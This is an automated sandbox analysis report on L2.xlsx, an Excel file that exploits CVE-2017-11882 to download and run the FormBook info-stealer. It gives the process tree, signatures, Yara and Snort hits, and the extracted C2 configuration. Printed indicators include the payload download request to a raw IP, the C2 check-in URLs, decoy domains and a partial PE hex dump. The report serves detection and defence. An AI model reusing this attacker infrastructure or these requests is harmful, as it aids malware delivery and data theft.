
Analysis Report L2.xlsx

Overview

General Information

Sample Name: L2.xlsx
Analysis ID: 433039
MD5: e5aaa3f2879244a0b44b27ce151e0c29
SHA1: eb0608507f6aa9432f276ab6fcaeddc7439bf169
SHA256: d9aa9baf5698eebd324bf2d501d72a62ce6973eeb42a7dce961d0e65baaad67f
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2596 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2844 cmdline: 'C:\Users\Public\vbc.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
      • vbc.exe (PID: 2888 cmdline: 'C:\Users\Public\vbc.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • control.exe (PID: 2444 cmdline: C:\Windows\SysWOW64\control.exe MD5: 9130377F87A2153FEAB900A00EA1EBFF)
            • cmd.exe (PID: 2264 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory-dump entries are collapsed on the original page)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.vbc.exe.510000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.510000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.510000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further unpacked-PE entries are collapsed on the original page)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 192.210.173.40, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2596, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2596, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2596, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2844
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2596, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2844

Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe | Metadefender: Detection: 17%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe | ReversingLabs: Detection: 41%
Source: C:\Users\Public\vbc.exe | Metadefender: Detection: 17%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: L2.xlsx | Virustotal: Detection: 30%
Source: L2.xlsx | ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe | Joe Sandbox ML: detected
Source: 5.2.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.vbc.exe.5b7268.1.unpack | Avira: Label: TR/Dropper.Gen
Source: 7.0.control.exe.c20000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 4.2.vbc.exe.510000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.2557960.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.control.exe.5f2210.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.vbc.exe.880000.2.unpack | Avira: Label: TR/Dropper.Gen
Source: 5.1.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.c20000.1.unpack | Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.2187506391.0000000000880000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040263E FindFirstFileA,
Source: excel.exe | Memory has grown: Private usage: 4MB later: 60MB
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop ebx
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop ebx
Source: global traffic | DNS query: name: www.alberthospice.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 192.210.173.40:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 192.210.173.40:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 192.210.173.40:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 45.195.169.197:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 45.195.169.197:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 45.195.169.197:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.alberthospice.com/sh2m/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.adultvideolife.xyz
Source: C:\Windows\SysWOW64\control.exe | DNS query: www.adultvideolife.xyz
Source: C:\Windows\SysWOW64\control.exe | DNS query: www.adultvideolife.xyz
Source: C:\Windows\SysWOW64\control.exe | DNS query: www.adultvideolife.xyz
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 06:06:46 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 10 Jun 2021 15:52:54 GMTETag: "36dc6-5c46b6262be11"Accept-Ranges: bytesContent-Length: 224710Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 
00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic | HTTP traffic detected: GET /sh2m/?5jYT=m8cHzjtXExYHSn&yb=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w== HTTP/1.1 | Host: www.alberthospice.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn HTTP/1.1 | Host: www.meganfantastic.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View | ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View | ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: global traffic | HTTP traffic detected: GET /files/loader2.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.210.173.40 | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9F87218.emf
Source: global traffic | HTTP traffic detected: GET /files/loader2.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.210.173.40 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /sh2m/?5jYT=m8cHzjtXExYHSn&yb=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w== HTTP/1.1 | Host: www.alberthospice.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn HTTP/1.1 | Host: www.meganfantastic.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: www.alberthospice.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Jun 2021 06:08:17 GMTContent-Type: text/htmlContent-Length: 479Connection: closeETag: "6080f05e-1df"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 